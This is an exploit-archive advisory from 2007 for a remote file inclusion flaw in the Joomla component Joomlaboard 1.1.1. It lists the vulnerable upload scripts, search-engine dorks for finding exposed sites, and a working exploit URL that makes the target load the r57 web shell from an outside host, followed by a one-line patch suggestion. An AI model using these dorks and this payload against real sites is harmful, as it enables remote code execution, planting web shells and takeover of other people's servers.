Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability
# Published : 2007-03-23
# Author : Cold Zero
# Previous Title : eWebquiz <= V.8 (eWebQuiz.asp) Remote SQL Injection Exploit
# Next Title : ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities

######################################################
#
# Joomla com_joomlaboard 1.1.x Branch (sbp) Multiple Remote File Include Vulnerabilities
# Joomlaboard Component 1.1.x Branch (sbp) Multiple Remote File Include Vulnerabilities
#
######################################################
#
# script : http://forge.joomla.org/sf/frs/do/viewRelease/projects.simpleboard/frs.joomlaboard_component.joomlaboard_1_1_x_branch
#
######################################################
#
# files : /image_upload.php , /file_upload.php ,
#
######################################################
#
# Dork : index2.php?option=com_joomlaboard , allinurl:"com_joomlaboard"
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell Crew
#
######################################################
#
# require_once("$sbp/sb_helpers.php");
# require_once("$sbp/sb_helpers.php");
#
######################################################
#
# exploit : http://www.example.com/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://nachrichtenmann.de/r57.txt?
# http://www.example.com/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://nachrichtenmann.de/r57.txt?
#
######################################################
#
# How To Fix It : U can put this code - defined( '_VALID_MOS' ) or die( 'Catch Me iF u Can ### Patched By Cold z3ro .' ); - after <?php code start
#
######################################################


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# www.Syue.com [2007-03-23]